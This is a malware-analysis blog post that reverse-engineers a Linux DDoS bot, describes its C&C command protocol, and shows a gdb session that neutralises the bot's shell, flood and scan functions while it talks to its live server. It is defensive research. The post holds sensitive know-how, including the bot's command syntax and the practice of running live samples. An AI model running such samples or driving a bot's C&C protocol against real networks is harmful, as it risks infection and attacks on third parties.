Monday 27 June 2016

Sandboxing a linux malware with gdb

1/ Intro

As I was browsing the other day, I noticed some ELF malware. I chose to analyze one.
At first, it was just to learn a few things, but I ended up writing a full gdb script which was able to safely monitor all the communications of this malware.

2/ Discovery

The file in question is an x86_64 ELF, statically linked, not stripped (!), weighing ~200 kBytes:
mitsurugi@dojo:~/infected$ file Rx64 
Rx64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
mitsurugi@dojo:~/infected$ ls -l Rx64 
-rw-r--r-- 1 mitsurugi mitsurugi 204783 juin  20 17:54 Rx64

(spoiler: in the end, I learned that this is a sample of the DDOSbot/gayfgt family)

3/ Reverse

The reversing is not difficult: there is no obfuscation, no anti-debug, no persistence. The binary only tries to be stealthy by forking at startup in order to hide its name, then it connects to a C&C and waits for commands.

The protocol used is really simple, it's a textual command/response one:
  • regularly, the server sends 'PING', the client replies 'PONG' and vice-versa
  • the server can close the communication
  • the server sets a secret at first use. Any call to the bot without that secret won't be followed by any action. The syntax is "!<secret> <action>"
  • the server can call any shell command
  • the server can call some other functions (flood and scan, basically)
With the reversing done, an idea came up: why not use this malware to connect to its C&C while monitoring it?

The logic of the bot can be seen as:

  doing some forks, but only one process remains
  connection to C&C
  A big loop here
    Some code to manage all the forks process if any
    Read data from network
      if PING, send PONG
      if DUP, then exit()
      if starting with !<secret> sh <args> => fork and call shell 
      if starting with !<secret> command args => call function (fork and flood or scan) 

There is nothing really dangerous here. If we just block the shell and flood/scan commands, we end up with a simple client awaiting orders. With this legitimate client, we can connect to the C&C and listen to what it tells us. We have to navigate through all the forks and avoid the dangerous commands, but with gdb you can put a breakpoint and set $rip elsewhere.
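
As a rough model of what the instrumented client ends up doing, here is the dispatch logic above written as a Python sketch with the dangerous branches turned into no-ops. It is only a model: the real work is done by the gdb script on the binary itself. The function name, the returned labels, and the default secret "*" (taken from the "!* SCANNER OFF" line in the transcript) are assumptions.

```python
def handle_line(line, secret="*"):
    """Classify one line received from the C&C and return (action, detail)."""
    text = line.strip()
    if text == "PING":
        return ("reply", "PONG")            # keep-alive, harmless
    if text == "DUP":
        return ("exit", "")                 # the server asks the bot to quit
    prefix = "!" + secret + " "
    if text.startswith(prefix):
        command = text[len(prefix):]
        verb = command.split(" ", 1)[0]
        if verb.lower() == "sh":            # shell command: never executed
            return ("blocked-shell", command)
        return ("blocked-command", command) # flood/scan and friends: ignored
    return ("ignore", text)                 # wrong secret or unknown input

for received in ["PING\n", "!* SCANNER OFF\n", "!* sh id\n", "DUP\n"]:
    print(handle_line(received))
```

Everything that could do harm is only logged, so the client keeps answering PING and stays connected.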

4/ Instrument it

While I was analysing the file, I began to write a gdb script in order to skip the forks, print the C&C server, and skip all the dangerous functions. This script became the one I'm showing here.

In the end, every dangerous function is totally neutralized, and I was able to launch the malware under gdb (and tor). It connects to the C&C and receives all commands :-)

Here is a live transcript. Nothing exciting shows up, just endless PING/PONG replies after a SCANNER OFF (interesting, is the C&C really up?)

root@kali:~# gdb -q Rx64 
Reading symbols from Rx64...(no debugging symbols found)...done.
gdb$ source breakpoints 

#  Starting instrumented binary

                             Nothing ventured, nothing gained.
              You can't do anything without risking something.

Breakpoint 1 at 0x406731
Breakpoint 2 at 0x4067d0
Breakpoint 3 at 0x406466
Breakpoint 4 at 0x40689b
Breakpoint 5 at 0x4069df
Breakpoint 6 at 0x406a4d
Breakpoint 7 at 0x406c4d
Breakpoint 8 at 0x406e0b
gdb$ r
Starting program: /root/Rx64 
Breakpoint 1, 0x0000000000406731 in main ()
main() function
Breakpoint 2, 0x00000000004067d0 in main ()
Skipping all the forks
and the setsid
Breakpoint 3, 0x0000000000406466 in initConnection ()
We got currentServer!
0x417120: ""
Breakpoint 4, 0x000000000040689b in main ()
Back to main
Jumping all code related to forks
Breakpoint 5, 0x00000000004069df in main ()
* C&C is talking to us:
*0x7fffffffd090: "!* SCANNER OFF\n"
C&C sends a command
Will safely ignore it
Breakpoint 4, 0x000000000040689b in main ()
Back to main
Jumping all code related to forks
Breakpoint 5, 0x00000000004069df in main ()
* C&C is talking to us:
*0x7fffffffd090: "PING\n"
buf: PONG
Breakpoint 4, 0x000000000040689b in main ()
Back to main
Jumping all code related to forks
Breakpoint 5, 0x00000000004069df in main ()
* C&C is talking to us:
*0x7fffffffd090: "PING\n"
buf: PONG
Program received signal SIGINT, Interrupt.

5/ Conclusion

The malware is a well-known linux malware, called DDOSbot or gayfgt; there are even some source samples available on the internet.

Binary and gdb script are available on github:

Talk is easy, action is difficult.
Action is easy, true understanding is difficult